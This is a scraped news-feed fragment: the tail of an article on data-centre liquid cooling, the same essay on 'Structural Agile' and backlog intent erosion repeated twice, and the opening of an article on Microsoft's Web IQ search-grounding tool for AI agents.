<p class="wp-block-paragraph">In some setups, direct-to-chip cooling is paired with rear-door heat exchangers. These capture any remaining heat as air leaves the rack, helping to push densities even higher without overloading the system.</p>



<p class="wp-block-paragraph">Ultimately, there isn’t a single “correct” way to approach cooling. The best method depends on the workloads being supported, the constraints of the facility and the organization’s longer-term plans. What’s clear, however, is that flexibility is becoming increasingly important as cooling requirements continue to evolve.</p>



<h2 class="wp-block-heading">Direct-to-chip vs immersion cooling</h2>



<p class="wp-block-paragraph">As liquid cooling gains traction, direct-to-chip is often compared with immersion cooling. While both approaches address the same fundamental problem — removing significantly higher levels of heat – they do so in very different ways, with different implications for how data centers are designed and operated.</p>



<p class="wp-block-paragraph">Immersion cooling takes a more radical route by fully submerging servers in dielectric fluid — a liquid that does not conduct electricity or conducts it extremely poorly. From a cooling perspective, it is highly effective and can handle extremely dense, high compute environments. But it comes with trade-offs.</p>



<p class="wp-block-paragraph">Immersion cooling requires a rethink of how data centers operate. It also demands significant infrastructure shifts, which can make adoption challenging for organizations with established data center models.</p>



<p class="wp-block-paragraph">Direct-to-chip cooling, on the other hand, offers a more gradual step forward. In general, servers keep their familiar design, and day-to-day maintenance doesn’t change dramatically. Teams can continue working in ways they already understand, making it a more practical step for many organizations.</p>



<p class="wp-block-paragraph">This practicality makes all the difference. For most organizations, the decision isn’t just about which solution performs best in theory, it’s about what can be deployed, managed and scaled within the realities of existing operations. In that sense, direct-to-chip strikes a balance between performance gains and operational continuity, making it a more accessible starting point for many data centers navigating the shift to higher-density workloads.</p>



<h2 class="wp-block-heading">Cooling as a competitive advantage</h2>



<p class="wp-block-paragraph">Cooling is no longer simply an operational concern. It is becoming a defining factor in how data centers scale, how efficiently they run and how reliably they perform. As AI workloads push infrastructure to new limits, the ability to manage heat effectively will directly influence how far and how fast organizations can grow.</p>



<p class="wp-block-paragraph">That shift is also changing who owns the conversation. Decisions that once sat with facilities teams are now firmly on the agenda for <a href="https://www.cio.com/article/4193828/preparing-for-infrastructure-constraints-from-memory-shortages-to-power-limits.html">CIOs, CTOs and infrastructure leaders</a>. Thermal design, energy efficiency and cooling architecture are no longer niche considerations, they are central to cost control, sustainability targets and overall competitiveness.</p>



<p class="wp-block-paragraph">At the same time, there is no one correct solution. Air cooling will continue to support many workloads, while immersion cooling will remain relevant for specialised, high-density use cases. Direct-to-chip cooling sits between the two, offering a practical way to handle increasing thermal demands without disrupting established operating models.</p>



<p class="wp-block-paragraph">For organizations planning the next phase of their infrastructure, cooling can no longer be treated as an afterthought. It needs to be considered alongside compute, storage and networking from the outset.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Structural agile: Why fast delivery quietly loses its meaning]]></title>
<description><![CDATA[Open the history tab of any epic that has been alive for more than two quarters. Go ahead, pick one. Count the edits. Somewhere around edit 11, the description was rewritten to satisfy a stakeholder who has since changed roles. Around edit 19, the scope was trimmed to protect a date that, in the ...]]></description>
<link>https://tsecurity.de/de/3707974/it-security-nachrichten/structural-agile-why-fast-delivery-quietly-loses-its-meaning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707974/it-security-nachrichten/structural-agile-why-fast-delivery-quietly-loses-its-meaning/</guid>
<pubDate>Thu, 06 Aug 2026 13:30:02 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Open the history tab of any epic that has been alive for more than two quarters. Go ahead, pick one. Count the edits. Somewhere around edit 11, the description was rewritten to satisfy a stakeholder who has since changed roles. Around edit 19, the scope was trimmed to protect a date that, in the end, moved anyway. By edit 26 someone renamed the whole thing, and the sentence that explained why the work existed in the first place didn’t survive the paste. 26 edits, several hundred hours of delivery behind them, and nobody left who can say what the money was for.</p>



<p class="wp-block-paragraph">Nobody deleted that reason on purpose. That’s what makes this so hard to see.</p>



<p class="wp-block-paragraph">I’ve been shuttling between the people who fund technology work and the teams who deliver it for a couple of decades now, and something has always struck me as odd: the backlog is probably the only important document in the enterprise that gets edited every day and remembers nothing. Contracts have version control and signatures. Financial statements have audit trails. Even architecture, in mature shops, has decision records. But the artifact that actually steers what hundreds of people build week after week? It has a title, a status and a description that mutates until the original intent becomes archaeology.</p>



<p class="wp-block-paragraph">The most expensive failures I’ve seen were all fast. The teams shipped and shipped, and somewhere along the way the work stopped meaning what everyone assumed it still meant. Nobody slowed down long enough to notice.</p>



<h2 class="wp-block-heading">One problem, two lenses</h2>



<p class="wp-block-paragraph">Strategy and delivery look at the same work through very different mental models. On one side, leaders talk in outcomes, intent and value; they worry about whether the original justification for the investment still holds months later. On the other side, teams think in iterations, flow and momentum, and they worry about keeping complex programs moving in small, manageable steps. Both lenses are legitimate, and in my experience both sides generally believe they’re the ones doing everything right.</p>



<p class="wp-block-paragraph">The disagreement between them is never loud. Strategy quietly assumes the logic will remain constant across every sprint and every decision. Delivery quietly assumes the strategic reasoning will naturally update itself based on what gets learned along the way. There’s nothing wrong with either assumption on its own. But in the absence of a structural bridge between them, every program gradually accumulates small half-measures and shifted meanings that nobody registers until it’s too late.</p>



<p class="wp-block-paragraph">The evidence on how badly intent travels is humbling. Donald Sull and his colleagues, in a multi-year study of strategy execution, found that <a href="https://hbr.org/2015/03/why-strategy-execution-unravelsand-what-to-do-about-it">only half of middle managers can name any of their company’s top five priorities</a>. Those are the managers. Now imagine the epic, eleven edits later.</p>



<p class="wp-block-paragraph">Let me be fair to <a href="https://agilemanifesto.org/">agile</a> here, because agile is not the villain. It does exactly what it says on the tin: it helps teams learn quickly and adjust to what they discover, and <a href="https://hbr.org/2018/05/agile-at-scale">that speed is a genuine strength</a>. The problem is that organizations blur the line between two kinds of change. Some of it is genuine learning: teams discover real behaviors, markets shift, leaders sharpen their thinking. And some of it is erosion, the slow loss of rationale that nobody actually decided and nobody can trace back to a witting choice. From the outside, the two are indistinguishable. They show up the same way in the tooling: movement in the backlog, shifting priorities, even working software. Only one of them stays anchored to the reason the money was spent.</p>



<p class="wp-block-paragraph">Most organizations have no instrument for telling these two apart. Which means they’re flying at full speed without knowing whether they’re navigating or just moving.</p>



<h2 class="wp-block-heading">The pattern we keep seeing</h2>



<h3 class="wp-block-heading">Agile in style, not in substance</h3>



<p class="wp-block-paragraph">The board gets moved every day, stand-ups start on time and retrospectives produce long lists of things to improve. Then you ask why a specific feature exists, what it’s actually meant to change, and the room gets quiet. The rituals persist while the substance underneath them slowly thins out. Teams keep closing tasks, and somewhere along the way they shed the shared sense of purpose that made the tasks worth doing.</p>



<h3 class="wp-block-heading">Velocity becomes a proxy for value</h3>



<p class="wp-block-paragraph">A smooth sprint demo can hide a deeper problem, because progress toward delivery and progress toward outcomes are two different measurements, and only one of them is on the wall. I’ve seen features that were stable, polished and warmly received in the demo, and that contributed absolutely nothing to the decision they were supposed to improve. The pace was real enough; whether any of it mattered took months to find out. And your delivery metrics can be excellent, genuinely excellent, while every one of these patterns is running underneath them.</p>



<p class="wp-block-paragraph">This is not a niche affliction, by the way. Pendo analyzed feature usage across hundreds of software products and found that <a href="https://www.pendo.io/resources/the-2019-feature-adoption-report/">80% of features are rarely or never used</a>. Built at full velocity, shipped into silence.</p>



<h3 class="wp-block-heading">Product owners absorb pressure instead of defending logic</h3>



<p class="wp-block-paragraph">The PO is supposed to hold the thread, to protect the reasoning behind the work when everyone else is pushing on it. In practice, many find themselves wedged between demand and delivery, forced into a permanent state of reactive prioritization. Over time they stop challenging requests. Then they stop defending the logic behind decisions. Eventually they stop framing choices around outcomes at all, and the backlog, which should be a strategic instrument, turns into the place where everything gets dumped because nobody has the space left to ask what actually belongs there.</p>



<h3 class="wp-block-heading">Backlog churn masks strategic drift</h3>



<p class="wp-block-paragraph">Items get revisited, split, recast and reprioritized as everyone works to keep momentum going, and from a distance it can all look like reasonable adaptation. But when the connection to intent is severed, all that motion begins to dissolve into static. Work keeps getting passed around, the board stays busy and the program veers off course without producing a single alarming signal, because busy is what everyone was looking for.</p>



<h3 class="wp-block-heading">Every quarter is a reset</h3>



<p class="wp-block-paragraph">New OKRs arrive. A fresh wave of leadership messaging follows. Sometimes the team gets reshuffled too. With each round, a little of the shared context that held everything together quietly slips away. Epics get new names, stories get rewritten, priorities rearrange themselves almost by accident. The organization keeps rebooting itself without ever asking what it left behind in the reset.</p>



<p class="wp-block-paragraph">Taken one at a time, each of these patterns is understandable, even forgivable. Together they produce a program that looks healthy from every angle while it quietly hollows out the meaning behind the work.</p>



<h2 class="wp-block-heading">Why this keeps happening, and why it’s about to get worse</h2>



<p class="wp-block-paragraph">Big programs tend to assume that intent will simply carry itself forward as the work passes through teams, decisions and iterations. It won’t. Intent doesn’t carry itself. If nobody actively preserves and updates the reasoning, it starts to loosen and fray, quietly and almost politely, one story, one trade-off, one shift in priority at a time.</p>



<p class="wp-block-paragraph">The structural cause is a speed mismatch that most governance was never designed for. The delivery system evolves in hours; the organization’s memory of why updates in quarters, if at all. In between those two clocks, thousands of micro-decisions reshape what the work means, far faster than anyone captures the reasoning behind them.</p>



<p class="wp-block-paragraph">Now add what’s happening in 2026. AI agents inside the delivery tooling can already <a href="https://support.atlassian.com/rovo/docs/agents/">organize, create and edit backlog items</a> on a team’s behalf. Atlassian’s own customers describe agents that <a href="https://www.atlassian.com/software/jira/ai">generate requirements, break them into epics and stories and take delegated work like a teammate</a>, and these capabilities now ship inside the standard Jira plans that most enterprises already pay for. I’m not against any of this; some of it is genuinely useful. But notice what it means for our problem. Every one of those operations is an edit to a document that has no memory. Backlog amnesia at human speed was survivable. Painful, but survivable, because humans forget slowly. Amnesia at machine speed is a different animal altogether. The ratio of motion to memory, already unhealthy in most organizations, is about to go vertical.</p>



<p class="wp-block-paragraph">If your backlog can’t remember why an item exists after a human rewrote it a few times, think about what happens when an agent grooms it continuously.</p>



<h2 class="wp-block-heading">What to do about it</h2>



<p class="wp-block-paragraph">The countermeasures I use are deliberately small. None of them adds a ceremony, a tool, or a governance layer. They simply orient the practices teams already run toward one job: keeping the reasoning alive while the work moves. Together, they form the discipline I call Structural Agile.</p>



<ul class="wp-block-list">
<li><strong>Start with the outcome. </strong>Before an epic or major story enters the backlog, three questions, every time: What behavior are we trying to shift? How will we know if that behavior changes? What signals will confirm success after release? If the room can’t answer, the work waits, because items that lack outcome clarity tend to drift first and drift fastest.</li>



<li><strong>Elevate the PO. </strong>Position the product owner as the carrier of outcome logic, with an explicit mandate to preserve rationale, flag trade-offs that erode intent and track deferred items together with the reasoning behind them. And be realistic about the limits, because many POs inherit chaotic backlogs, rotate mid-stream, or simply lack the authority to push back on stakeholders. The rule I give teams is simple: if the PO can’t carry the logic, someone must: a coach prompting context checks, an architect recording the reasoning behind technical trade-offs, an analyst keeping the outcome picture current. Build logic stewardship into the structure. Left to personality, it leaves with the person.</li>



<li><strong>Anchor epics to why. </strong>Every epic carries its rationale as metadata, inside the tool where the work actually lives. Slide decks from last spring don’t count. When a decision reshapes the epic, the rationale gets updated in the same motion; waivers and scope cuts get recorded next to the item they changed. Do this consistently and the backlog stops being a queue of tasks and becomes a living map of intent, one that a new joiner can read on day one, and that survives a challenge from leadership without anyone having to reconstruct history from memory. It cuts both ways, too: the same rationale that protects the team from whiplash protects the business from a backlog that has drifted away from what they actually asked for. Prioritization turns into a conversation about evidence rather than a contest of opinions.</li>



<li><strong>Rehearse erosion. </strong>This is the practice I’d start with, and the one that surprises teams most. Every two or three sprints, run a short, structured session that is not a retrospective and not a risk review. Its purpose is to test the continuity of intent itself: Does the assumed user behavior still make sense? Where might adoption fail even though delivery is technically correct? Which parts of the outcome logic feel fragile, outdated, or untested? A retro examines how the team worked; an erosion rehearsal examines whether the reasoning still holds. You rehearse erosion the same way pilots rehearse emergencies: you hope the drill is wasted, and you run it anyway, because catching drift early is what makes fixing it cheap. In my experience, a single one of these sessions surfaces more strategic risk than a quarter’s worth of status reporting, and it costs the team about half an hour.</li>



<li><strong>Keep the logic alive. </strong>Capture only what prevents strategic amnesia and nothing more: why a feature was removed or reshaped, who approved it and which assumptions should be revisited, and when. Keep it visible where teams already work. If logic lives in Confluence but dies in conversation, it’s already gone.</li>
</ul>



<h2 class="wp-block-heading">Start Monday</h2>



<p class="wp-block-paragraph">You don’t need a reorganization or a new framework to begin, and frankly you shouldn’t want one. Three entry points, close to zero overhead. Assign a critical reviewer: one team member whose standing job is to periodically ask whether stories still connect to the intended outcome. Add a one-minute outcome check before major refinements: the behavior targeted, the indicator watched, the signal expected. And run a single erosion rehearsal on your most important program; teams usually surface something real in the first session, long before it would have shown up in any metric.</p>



<p class="wp-block-paragraph">For readers keeping score: yes, neighboring practices exist, and they’re good ones. <a href="https://www.cognitect.com/blog/2011/11/15/documenting-architecture-decisions">Architecture decision records</a> preserve the why behind technical choices, and <a href="https://www.impactmapping.org/">impact mapping</a> connects deliverables to goals at planning time. I use both. Neither operates continuously, inside the backlog, at the level of the individual item, which happens to be exactly where the forgetting occurs. OKRs don’t solve it either; objectives at altitude are necessary, but teams still need the rationale embedded in the work itself, so they don’t have to keep a separate decoder.</p>



<h2 class="wp-block-heading">The history tab, revisited</h2>



<p class="wp-block-paragraph">Go back to that epic with the twenty-six edits, and imagine the same history with one difference: each consequential edit carries a line of reasoning, current and human-readable, and every few sprints someone deliberately tested whether that reasoning still held. Same team, same velocity, same tool and a completely different answer when someone finally asks why the work exists.</p>



<p class="wp-block-paragraph">Velocity tells you how fast the work is moving. Only memory can tell you whether anyone still knows where it’s going.</p>



<p class="wp-block-paragraph">I’ve published the full discipline behind this approach (the five principles, the roles, the facilitation guides and the objections seasoned practitioners will raise, along with my answers) as a <a href="https://pmworldlibrary.net/wp-content/uploads/2026/02/pmwj161-Feb2026-Kadaoui-Structural-Agile-featured-paper-1.pdf">featured paper in PM World Journal</a>. The mechanics are free to steal. The forgetting, at this point, is optional.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Structural agile: Why fast delivery quietly loses its meaning]]></title>
<description><![CDATA[Open the history tab of any epic that has been alive for more than two quarters. Go ahead, pick one. Count the edits. Somewhere around edit 11, the description was rewritten to satisfy a stakeholder who has since changed roles. Around edit 19, the scope was trimmed to protect a date that, in the ...]]></description>
<link>https://tsecurity.de/de/3707966/it-nachrichten/structural-agile-why-fast-delivery-quietly-loses-its-meaning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707966/it-nachrichten/structural-agile-why-fast-delivery-quietly-loses-its-meaning/</guid>
<pubDate>Thu, 06 Aug 2026 13:28:37 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Open the history tab of any epic that has been alive for more than two quarters. Go ahead, pick one. Count the edits. Somewhere around edit 11, the description was rewritten to satisfy a stakeholder who has since changed roles. Around edit 19, the scope was trimmed to protect a date that, in the end, moved anyway. By edit 26 someone renamed the whole thing, and the sentence that explained why the work existed in the first place didn’t survive the paste. 26 edits, several hundred hours of delivery behind them, and nobody left who can say what the money was for.</p>



<p class="wp-block-paragraph">Nobody deleted that reason on purpose. That’s what makes this so hard to see.</p>



<p class="wp-block-paragraph">I’ve been shuttling between the people who fund technology work and the teams who deliver it for a couple of decades now, and something has always struck me as odd: the backlog is probably the only important document in the enterprise that gets edited every day and remembers nothing. Contracts have version control and signatures. Financial statements have audit trails. Even architecture, in mature shops, has decision records. But the artifact that actually steers what hundreds of people build week after week? It has a title, a status and a description that mutates until the original intent becomes archaeology.</p>



<p class="wp-block-paragraph">The most expensive failures I’ve seen were all fast. The teams shipped and shipped, and somewhere along the way the work stopped meaning what everyone assumed it still meant. Nobody slowed down long enough to notice.</p>



<h2 class="wp-block-heading">One problem, two lenses</h2>



<p class="wp-block-paragraph">Strategy and delivery look at the same work through very different mental models. On one side, leaders talk in outcomes, intent and value; they worry about whether the original justification for the investment still holds months later. On the other side, teams think in iterations, flow and momentum, and they worry about keeping complex programs moving in small, manageable steps. Both lenses are legitimate, and in my experience both sides generally believe they’re the ones doing everything right.</p>



<p class="wp-block-paragraph">The disagreement between them is never loud. Strategy quietly assumes the logic will remain constant across every sprint and every decision. Delivery quietly assumes the strategic reasoning will naturally update itself based on what gets learned along the way. There’s nothing wrong with either assumption on its own. But in the absence of a structural bridge between them, every program gradually accumulates small half-measures and shifted meanings that nobody registers until it’s too late.</p>



<p class="wp-block-paragraph">The evidence on how badly intent travels is humbling. Donald Sull and his colleagues, in a multi-year study of strategy execution, found that <a href="https://hbr.org/2015/03/why-strategy-execution-unravelsand-what-to-do-about-it">only half of middle managers can name any of their company’s top five priorities</a>. Those are the managers. Now imagine the epic, eleven edits later.</p>



<p class="wp-block-paragraph">Let me be fair to <a href="https://agilemanifesto.org/">agile</a> here, because agile is not the villain. It does exactly what it says on the tin: it helps teams learn quickly and adjust to what they discover, and <a href="https://hbr.org/2018/05/agile-at-scale">that speed is a genuine strength</a>. The problem is that organizations blur the line between two kinds of change. Some of it is genuine learning: teams discover real behaviors, markets shift, leaders sharpen their thinking. And some of it is erosion, the slow loss of rationale that nobody actually decided and nobody can trace back to a witting choice. From the outside, the two are indistinguishable. They show up the same way in the tooling: movement in the backlog, shifting priorities, even working software. Only one of them stays anchored to the reason the money was spent.</p>



<p class="wp-block-paragraph">Most organizations have no instrument for telling these two apart. Which means they’re flying at full speed without knowing whether they’re navigating or just moving.</p>



<h2 class="wp-block-heading">The pattern we keep seeing</h2>



<h3 class="wp-block-heading">Agile in style, not in substance</h3>



<p class="wp-block-paragraph">The board gets moved every day, stand-ups start on time and retrospectives produce long lists of things to improve. Then you ask why a specific feature exists, what it’s actually meant to change, and the room gets quiet. The rituals persist while the substance underneath them slowly thins out. Teams keep closing tasks, and somewhere along the way they shed the shared sense of purpose that made the tasks worth doing.</p>



<h3 class="wp-block-heading">Velocity becomes a proxy for value</h3>



<p class="wp-block-paragraph">A smooth sprint demo can hide a deeper problem, because progress toward delivery and progress toward outcomes are two different measurements, and only one of them is on the wall. I’ve seen features that were stable, polished and warmly received in the demo, and that contributed absolutely nothing to the decision they were supposed to improve. The pace was real enough; whether any of it mattered took months to find out. And your delivery metrics can be excellent, genuinely excellent, while every one of these patterns is running underneath them.</p>



<p class="wp-block-paragraph">This is not a niche affliction, by the way. Pendo analyzed feature usage across hundreds of software products and found that <a href="https://www.pendo.io/resources/the-2019-feature-adoption-report/">80% of features are rarely or never used</a>. Built at full velocity, shipped into silence.</p>



<h3 class="wp-block-heading">Product owners absorb pressure instead of defending logic</h3>



<p class="wp-block-paragraph">The PO is supposed to hold the thread, to protect the reasoning behind the work when everyone else is pushing on it. In practice, many find themselves wedged between demand and delivery, forced into a permanent state of reactive prioritization. Over time they stop challenging requests. Then they stop defending the logic behind decisions. Eventually they stop framing choices around outcomes at all, and the backlog, which should be a strategic instrument, turns into the place where everything gets dumped because nobody has the space left to ask what actually belongs there.</p>



<h3 class="wp-block-heading">Backlog churn masks strategic drift</h3>



<p class="wp-block-paragraph">Items get revisited, split, recast and reprioritized as everyone works to keep momentum going, and from a distance it can all look like reasonable adaptation. But when the connection to intent is severed, all that motion begins to dissolve into static. Work keeps getting passed around, the board stays busy and the program veers off course without producing a single alarming signal, because busy is what everyone was looking for.</p>



<h3 class="wp-block-heading">Every quarter is a reset</h3>



<p class="wp-block-paragraph">New OKRs arrive. A fresh wave of leadership messaging follows. Sometimes the team gets reshuffled too. With each round, a little of the shared context that held everything together quietly slips away. Epics get new names, stories get rewritten, priorities rearrange themselves almost by accident. The organization keeps rebooting itself without ever asking what it left behind in the reset.</p>



<p class="wp-block-paragraph">Taken one at a time, each of these patterns is understandable, even forgivable. Together they produce a program that looks healthy from every angle while it quietly hollows out the meaning behind the work.</p>



<h2 class="wp-block-heading">Why this keeps happening, and why it’s about to get worse</h2>



<p class="wp-block-paragraph">Big programs tend to assume that intent will simply carry itself forward as the work passes through teams, decisions and iterations. It won’t. Intent doesn’t carry itself. If nobody actively preserves and updates the reasoning, it starts to loosen and fray, quietly and almost politely, one story, one trade-off, one shift in priority at a time.</p>



<p class="wp-block-paragraph">The structural cause is a speed mismatch that most governance was never designed for. The delivery system evolves in hours; the organization’s memory of why updates in quarters, if at all. In between those two clocks, thousands of micro-decisions reshape what the work means, far faster than anyone captures the reasoning behind them.</p>



<p class="wp-block-paragraph">Now add what’s happening in 2026. AI agents inside the delivery tooling can already <a href="https://support.atlassian.com/rovo/docs/agents/">organize, create and edit backlog items</a> on a team’s behalf. Atlassian’s own customers describe agents that <a href="https://www.atlassian.com/software/jira/ai">generate requirements, break them into epics and stories and take delegated work like a teammate</a>, and these capabilities now ship inside the standard Jira plans that most enterprises already pay for. I’m not against any of this; some of it is genuinely useful. But notice what it means for our problem. Every one of those operations is an edit to a document that has no memory. Backlog amnesia at human speed was survivable. Painful, but survivable, because humans forget slowly. Amnesia at machine speed is a different animal altogether. The ratio of motion to memory, already unhealthy in most organizations, is about to go vertical.</p>



<p class="wp-block-paragraph">If your backlog can’t remember why an item exists after a human rewrote it a few times, think about what happens when an agent grooms it continuously.</p>



<h2 class="wp-block-heading">What to do about it</h2>



<p class="wp-block-paragraph">The countermeasures I use are deliberately small. None of them adds a ceremony, a tool, or a governance layer. They simply orient the practices teams already run toward one job: keeping the reasoning alive while the work moves. Together, they form the discipline I call Structural Agile.</p>



<ul class="wp-block-list">
<li><strong>Start with the outcome. </strong>Before an epic or major story enters the backlog, three questions, every time: What behavior are we trying to shift? How will we know if that behavior changes? What signals will confirm success after release? If the room can’t answer, the work waits, because items that lack outcome clarity tend to drift first and drift fastest.</li>



<li><strong>Elevate the PO. </strong>Position the product owner as the carrier of outcome logic, with an explicit mandate to preserve rationale, flag trade-offs that erode intent and track deferred items together with the reasoning behind them. And be realistic about the limits, because many POs inherit chaotic backlogs, rotate mid-stream, or simply lack the authority to push back on stakeholders. The rule I give teams is simple: if the PO can’t carry the logic, someone must: a coach prompting context checks, an architect recording the reasoning behind technical trade-offs, an analyst keeping the outcome picture current. Build logic stewardship into the structure. Left to personality, it leaves with the person.</li>



<li><strong>Anchor epics to why. </strong>Every epic carries its rationale as metadata, inside the tool where the work actually lives. Slide decks from last spring don’t count. When a decision reshapes the epic, the rationale gets updated in the same motion; waivers and scope cuts get recorded next to the item they changed. Do this consistently and the backlog stops being a queue of tasks and becomes a living map of intent, one that a new joiner can read on day one, and that survives a challenge from leadership without anyone having to reconstruct history from memory. It cuts both ways, too: the same rationale that protects the team from whiplash protects the business from a backlog that has drifted away from what they actually asked for. Prioritization turns into a conversation about evidence rather than a contest of opinions.</li>



<li><strong>Rehearse erosion. </strong>This is the practice I’d start with, and the one that surprises teams most. Every two or three sprints, run a short, structured session that is not a retrospective and not a risk review. Its purpose is to test the continuity of intent itself: Does the assumed user behavior still make sense? Where might adoption fail even though delivery is technically correct? Which parts of the outcome logic feel fragile, outdated, or untested? A retro examines how the team worked; an erosion rehearsal examines whether the reasoning still holds. You rehearse erosion the same way pilots rehearse emergencies: you hope the drill is wasted, and you run it anyway, because catching drift early is what makes fixing it cheap. In my experience, a single one of these sessions surfaces more strategic risk than a quarter’s worth of status reporting, and it costs the team about half an hour.</li>



<li><strong>Keep the logic alive. </strong>Capture only what prevents strategic amnesia and nothing more: why a feature was removed or reshaped, who approved it and which assumptions should be revisited, and when. Keep it visible where teams already work. If logic lives in Confluence but dies in conversation, it’s already gone.</li>
</ul>



<h2 class="wp-block-heading">Start Monday</h2>



<p class="wp-block-paragraph">You don’t need a reorganization or a new framework to begin, and frankly you shouldn’t want one. Three entry points, close to zero overhead. Assign a critical reviewer: one team member whose standing job is to periodically ask whether stories still connect to the intended outcome. Add a one-minute outcome check before major refinements: the behavior targeted, the indicator watched, the signal expected. And run a single erosion rehearsal on your most important program; teams usually surface something real in the first session, long before it would have shown up in any metric.</p>



<p class="wp-block-paragraph">For readers keeping score: yes, neighboring practices exist, and they’re good ones. <a href="https://www.cognitect.com/blog/2011/11/15/documenting-architecture-decisions">Architecture decision records</a> preserve the why behind technical choices, and <a href="https://www.impactmapping.org/">impact mapping</a> connects deliverables to goals at planning time. I use both. Neither operates continuously, inside the backlog, at the level of the individual item, which happens to be exactly where the forgetting occurs. OKRs don’t solve it either; objectives at altitude are necessary, but teams still need the rationale embedded in the work itself, so they don’t have to keep a separate decoder.</p>



<h2 class="wp-block-heading">The history tab, revisited</h2>



<p class="wp-block-paragraph">Go back to that epic with the twenty-six edits, and imagine the same history with one difference: each consequential edit carries a line of reasoning, current and human-readable, and every few sprints someone deliberately tested whether that reasoning still held. Same team, same velocity, same tool and a completely different answer when someone finally asks why the work exists.</p>



<p class="wp-block-paragraph">Velocity tells you how fast the work is moving. Only memory can tell you whether anyone still knows where it’s going.</p>



<p class="wp-block-paragraph">I’ve published the full discipline behind this approach (the five principles, the roles, the facilitation guides and the objections seasoned practitioners will raise, along with my answers) as a <a href="https://pmworldlibrary.net/wp-content/uploads/2026/02/pmwj161-Feb2026-Kadaoui-Structural-Agile-featured-paper-1.pdf">featured paper in PM World Journal</a>. The mechanics are free to steal. The forgetting, at this point, is optional.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Web IQ: Ground your AI agents with up-to-date web data]]></title>
<description><![CDATA[Microsoft has unveiled a suite of IQ products over the last few months. Work IQ, Fabric IQ, and Foundry IQ build on what Microsoft used to call its “Graphs,” the underlying data architecture that underpins its cloud services. These graphs provided a way to query the data your business uses, treat...]]></description>
<link>https://tsecurity.de/de/3707919/ai-nachrichten/microsoft-web-iq-ground-your-ai-agents-with-up-to-date-web-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707919/ai-nachrichten/microsoft-web-iq-ground-your-ai-agents-with-up-to-date-web-data/</guid>
<pubDate>Thu, 06 Aug 2026 13:18:55 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft has unveiled <a href="https://www.microsoft.com/en-us/ai/microsoft-iq#Products">a suite of IQ products</a> over the last few months. Work IQ, Fabric IQ, and Foundry IQ build on what Microsoft used to call its “Graphs,” the underlying data architecture that underpins its cloud services. These graphs provided a way to query the data your business uses, treating that data as nodes in a graph database and using the <a href="https://www.infoworld.com/article/2267992/what-is-graphql-better-apis-by-design.html" data-type="link" data-id="https://www.infoworld.com/article/2267992/what-is-graphql-better-apis-by-design.html">GraphQL API model</a> to extract that data — for example, to pull data related to a specific individual held across the various Microsoft 365 applications.</p>



<p class="wp-block-paragraph">The IQ suite follows a similar approach, using the same data, but treating it as the sparse vector store needed to provide grounding data for <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" data-type="link" data-id="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html">LLM</a>-based applications. By treating the data as a set of <a href="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html" data-type="link" data-id="https://www.infoworld.com/article/2335281/vector-databases-in-llms-and-search.html">embedding vectors</a>, and integrating it with <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers, Microsoft is giving you the necessary tools to tie LLM output to your data, reducing the risk of hallucination and improving accuracy. Using your own data is a key part of delivering effective agents, ensuring they work within your constraints.</p>



<h2 class="wp-block-heading">Extending IQ to the web</h2>



<p class="wp-block-paragraph"><a href="https://www.microsoft.com/en-us/webiq" data-type="link" data-id="https://www.microsoft.com/en-us/webiq">Web IQ</a>, the latest member of the IQ suite, was unveiled at Build 2026. A modernization of the retired Bing Search APIs, <a href="https://webiq.microsoft.ai/documentation/overview/">Web IQ is an agent-focused web search tool</a> that builds on the massive Bing search index to provide up-to-date general information for use in your applications.</p>



<p class="wp-block-paragraph">It may seem a little odd to be talking about a web-wide source of grounding data in the context of a suite of tools that exist to improve the accuracy of your AI applications by providing access to your Microsoft-hosted data. However, in many cases you want to link your agent not only to your data but also to related information from the wider world. For example, an agent powering an ecommerce service could use Web IQ and web-based data sources to provide product comparisons. An agent managing stock levels for a product that is weather-sensitive could use Web IQ as a source of weather data, using Bing’s multiple weather feeds and forecasts.</p>



<p class="wp-block-paragraph">Just as Google Gemini drew on Google Search, Microsoft Copilot began by using Bing search data to provide grounding for consumer chatbots. It’s easy to take a service like Bing and use it with a LLM, as the nearest neighbor search algorithms use semantic vector similarity techniques to find results that look like your query, ranking them according to their proximity to your search terms.</p>



<p class="wp-block-paragraph">Microsoft has been tuning its search vector index and the underlying technology stack to work with agents, as agents operate much differently than humans searching the web or querying a chatbot. Providing web search capabilities to agents means having to deal with persistent queries, as the agent hunts for the information it needs, refining queries and applying reasoning algorithms to develop the response it needs. LLM inferencing requires quick responses that deliver large amounts of data, working with queries that go far beyond the one-word or two-word requests that are typical of humans.</p>



<h2 class="wp-block-heading">More than the training weights</h2>



<p class="wp-block-paragraph">Using Web IQ gives you access to up-to-date information, beyond the training data used to build and weight an LLM. Bing’s crawler works within the standards developed by the search engine industry, obeying meta tags and using its own algorithms to crawl regularly updated websites more often. Bing’s crawler ensures that data is both fresh and being used appropriately, with a focus on quality rather than quantity.</p>



